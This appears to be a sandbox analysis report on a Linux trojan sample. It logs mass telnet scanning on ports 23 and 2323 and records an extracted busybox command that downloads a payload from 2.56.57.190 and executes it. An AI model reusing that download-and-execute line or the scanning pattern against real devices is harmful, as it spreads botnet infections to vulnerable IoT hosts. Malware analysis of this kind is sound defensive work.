Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 64.173.12.215:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 86.119.136.127:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 100.4.119.134:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 73.51.176.2:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 72.87.231.212:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 221.126.169.229:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 132.120.213.120:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 174.72.240.100:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 211.27.194.13:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 17.79.49.195:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 168.222.131.246:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 166.141.63.95:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 68.90.131.139:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 177.161.44.39:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 124.6.40.181:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 54.34.233.199:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 125.180.58.234:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 61.22.73.164:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 51.137.157.112:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 136.110.55.114:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 14.55.23.191:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 148.59.255.124:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 204.115.95.77:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 34.201.109.121:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 202.90.112.121:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 124.144.137.153:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 58.221.130.226:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 110.169.236.228:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 170.58.237.194:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 129.195.136.43:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 12.84.166.241:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 40.221.239.33:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 68.201.173.224:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 167.172.140.63:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 203.244.50.184:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 34.179.137.74:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 154.211.85.190:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 119.146.188.47:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 221.92.26.243:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 205.201.242.234:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 85.65.214.57:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 137.227.160.121:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 8.18.35.168:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 38.206.141.138:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 77.119.126.229:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 120.90.133.154:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 95.212.3.124:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 141.219.2.157:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 47.35.221.215:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 2.170.71.89:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 128.119.35.58:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 38.9.250.95:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 147.197.24.122:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 223.41.203.33:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 203.25.49.190:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 13.195.26.205:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 193.167.113.55:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 136.58.227.106:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 207.50.176.33:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 153.166.99.219:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 143.191.198.235:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 81.36.212.16:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 157.13.191.1:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 59.149.126.23:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 115.122.218.80:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 72.48.147.88:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 173.159.45.91:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 66.226.33.119:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 54.233.221.114:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 67.236.239.50:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 145.38.89.57:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 213.255.75.138:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 69.222.226.213:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 97.58.75.222:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 73.61.112.205:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 136.252.95.185:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 34.117.103.200:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 202.132.127.235:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 203.43.125.18:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 9.201.155.63:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 176.88.205.147:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 222.123.246.86:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 190.204.58.147:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 118.169.3.157:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 77.203.68.122:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 89.107.111.210:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 123.15.246.210:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 163.4.214.235:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 165.133.232.45:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 101.187.125.176:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 116.128.166.136:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 206.109.174.20:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 134.87.74.114:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 130.166.167.27:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 191.215.106.48:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 98.164.93.157:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 59.115.69.114:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 170.129.252.26:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 17.140.212.172:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 139.185.38.117:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 132.4.17.44:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 183.231.151.112:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 42.30.157.27:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 223.93.174.76:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 76.243.30.48:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 66.252.167.240:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 150.198.44.139:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 162.180.233.167:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 132.119.121.216:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 71.212.115.233:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 199.33.16.243:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 113.178.141.212:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 125.90.94.218:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 123.94.212.194:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 99.205.187.181:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 9.201.14.234:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 96.200.187.190:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 193.174.9.81:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 135.95.164.231:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 18.202.187.29:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 48.197.198.223:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 74.95.143.43:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 173.164.135.25:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 14.6.239.23:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 14.118.140.94:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 62.24.237.113:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 50.75.23.153:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 36.123.13.250:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 78.116.85.81:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 196.128.120.97:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 157.60.96.39:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 75.168.88.102:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 147.166.233.24:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 167.145.192.126:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 34.248.215.173:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 63.161.254.78:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 187.121.7.235:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 201.65.201.135:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 184.204.80.22:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 52.207.211.144:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 34.43.122.163:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 14.237.21.27:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 133.205.235.88:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 189.4.39.100:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 166.76.32.207:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 173.252.33.161:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 101.230.216.157:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 162.122.163.62:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 130.134.129.207:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 170.66.224.237:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 198.111.144.140:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 54.251.25.212:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 133.248.216.111:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 144.42.169.62:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 205.66.35.60:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 205.99.150.230:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 209.247.246.43:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 153.165.179.12:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 118.153.117.150:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 205.208.111.21:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 137.142.43.173:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 143.162.224.0:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 27.158.225.120:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 191.163.47.183:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 146.133.55.215:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 97.81.28.43:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 14.155.61.76:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 32.164.143.83:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 83.90.209.196:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 163.194.202.71:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 14.128.59.185:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 134.112.9.8:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 63.158.241.129:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 72.95.89.38:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 136.245.196.233:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 185.180.148.66:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 90.160.142.238:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 158.102.224.246:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 105.136.94.26:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 143.160.123.93:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 64.132.3.62:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 92.66.198.141:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 46.252.29.144:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 31.198.119.167:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 112.97.254.90:2323
Source: global traffic	TCP traffic: 192.168.2.23:50877 -> 108.48.178.203:2323

Source: /tmp/TudQawdlbF (PID: 5209)

Socket: 127.0.0.1::39148

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40474 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 141.86.198.69
Source: unknown	TCP traffic detected without corresponding DNS query: 149.187.171.69
Source: unknown	TCP traffic detected without corresponding DNS query: 88.189.224.68
Source: unknown	TCP traffic detected without corresponding DNS query: 93.241.141.26
Source: unknown	TCP traffic detected without corresponding DNS query: 220.80.143.59
Source: unknown	TCP traffic detected without corresponding DNS query: 82.154.133.222
Source: unknown	TCP traffic detected without corresponding DNS query: 146.29.155.107
Source: unknown	TCP traffic detected without corresponding DNS query: 133.58.95.237
Source: unknown	TCP traffic detected without corresponding DNS query: 108.60.195.1
Source: unknown	TCP traffic detected without corresponding DNS query: 9.209.69.154
Source: unknown	TCP traffic detected without corresponding DNS query: 82.249.97.174
Source: unknown	TCP traffic detected without corresponding DNS query: 50.202.185.87
Source: unknown	TCP traffic detected without corresponding DNS query: 75.83.111.138
Source: unknown	TCP traffic detected without corresponding DNS query: 43.224.41.107
Source: unknown	TCP traffic detected without corresponding DNS query: 216.217.0.41
Source: unknown	TCP traffic detected without corresponding DNS query: 172.188.106.136
Source: unknown	TCP traffic detected without corresponding DNS query: 178.106.141.236
Source: unknown	TCP traffic detected without corresponding DNS query: 53.80.128.113
Source: unknown	TCP traffic detected without corresponding DNS query: 98.216.11.125
Source: unknown	TCP traffic detected without corresponding DNS query: 121.35.234.62
Source: unknown	TCP traffic detected without corresponding DNS query: 101.207.243.236
Source: unknown	TCP traffic detected without corresponding DNS query: 8.253.93.142
Source: unknown	TCP traffic detected without corresponding DNS query: 208.44.174.245
Source: unknown	TCP traffic detected without corresponding DNS query: 174.106.85.149
Source: unknown	TCP traffic detected without corresponding DNS query: 58.185.186.163
Source: unknown	TCP traffic detected without corresponding DNS query: 101.166.89.67
Source: unknown	TCP traffic detected without corresponding DNS query: 144.93.192.164
Source: unknown	TCP traffic detected without corresponding DNS query: 77.73.19.234
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.182.69
Source: unknown	TCP traffic detected without corresponding DNS query: 69.36.195.1
Source: unknown	TCP traffic detected without corresponding DNS query: 102.64.118.166
Source: unknown	TCP traffic detected without corresponding DNS query: 91.198.168.1
Source: unknown	TCP traffic detected without corresponding DNS query: 164.75.44.95
Source: unknown	TCP traffic detected without corresponding DNS query: 167.60.38.113
Source: unknown	TCP traffic detected without corresponding DNS query: 83.44.153.70
Source: unknown	TCP traffic detected without corresponding DNS query: 213.4.146.237
Source: unknown	TCP traffic detected without corresponding DNS query: 51.204.223.48
Source: unknown	TCP traffic detected without corresponding DNS query: 24.99.45.174
Source: unknown	TCP traffic detected without corresponding DNS query: 171.119.75.215
Source: unknown	TCP traffic detected without corresponding DNS query: 150.243.17.14
Source: unknown	TCP traffic detected without corresponding DNS query: 71.177.246.80
Source: unknown	TCP traffic detected without corresponding DNS query: 169.143.83.110
Source: unknown	TCP traffic detected without corresponding DNS query: 50.135.255.135
Source: unknown	TCP traffic detected without corresponding DNS query: 162.100.4.89
Source: unknown	TCP traffic detected without corresponding DNS query: 168.107.21.245
Source: unknown	TCP traffic detected without corresponding DNS query: 100.37.150.96
Source: unknown	TCP traffic detected without corresponding DNS query: 47.81.35.34
Source: unknown	TCP traffic detected without corresponding DNS query: 176.59.139.15
Source: unknown	TCP traffic detected without corresponding DNS query: 77.94.12.49
Source: unknown	TCP traffic detected without corresponding DNS query: 213.245.144.200

Source: ELF static info symbol of initial sample

.symtab present: no

Source: Initial sample	String containing 'busybox' found: $(/bin/busybox wget -g 2.56.57.190 -l /tmp/skere -r /x; /bin/busybox chmod 777 * /tmp/skere; /tmp/skere huawei)
Source: Initial sample	String containing 'busybox' found: $(/bin/busybox wget -g 2.56.57.190 -l /tmp/skere -r /x; /bin/busybox chmod 777 * /tmp/skere; /tmp/skere huawei)/proc//exe/maps/cmdline.armv7l.arm7armv7l.arm7..armv6l.arm6armv6l.arm6..armv5l.arm5armv5l.arm5..armv4l.arm4armv4l.arm4..mipsel.mpslmipsel.mpsl..mipsmips..sh4sh4..ppcppc..i686i686..x86x86..i586i586./,

Source: classification engine

Classification label: mal68.troj.lin@0/0@0/0

Source: /usr/bin/dash (PID: 5258)

Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.XirojNzOMl /tmp/tmp.CnxdzwO3rm /tmp/tmp.iXnCqWUK00

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 59432
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 59558
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 59588
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 59616
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 59646
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 59662
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 59678
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 59822
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 59844
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 59872
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 59900
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 59872
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 59932
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60322
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35548
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60346
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35570
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60384
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35612
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35704
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35762
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60464
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35808
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60626
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35858
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60668
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35904
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35948
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35974
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 36202
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40118
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40126
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 36228
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40136
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40146
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40154
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40166
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40174
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40182
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 36262
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40186
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40196
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40202
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40218
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40224
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40232
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 36314
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40238
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40248
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40260
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40268
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40276
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40284
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40290
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 36368
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40298
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40304
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40314
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40320
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40328
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40332
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 36422
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40336
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40346
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40350
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40358
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40362
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40370
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40374
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 36462
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40378
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40386
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40394
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40402
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40406
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40414
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 36502
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40420
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40428
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40438
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40442
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40450
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40458
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 36544
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40466
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40476
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40482
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40492
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40498
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40504
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40506
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 36594
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40516
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38304
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 36644
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38330
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 36674
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38358
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38390
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 36712
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38422
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 36764
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38446
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 36798
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38472
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38498
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 36834
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38520
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 36862
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38542
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38570
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 36902
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38596
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 36944
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38624
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 36982
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38652
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38680
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37016
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38702
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37050
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38732
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38766
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37094
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38794
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37138
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38830
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37188
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38854
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38882
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37216
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38910
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37254
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38940
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38970
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37300
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 38998
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37340
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39018
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37362
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39036
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39072
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37404
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39100
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37444
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39132
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37494
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39174
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39206
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37534
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39240
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37586
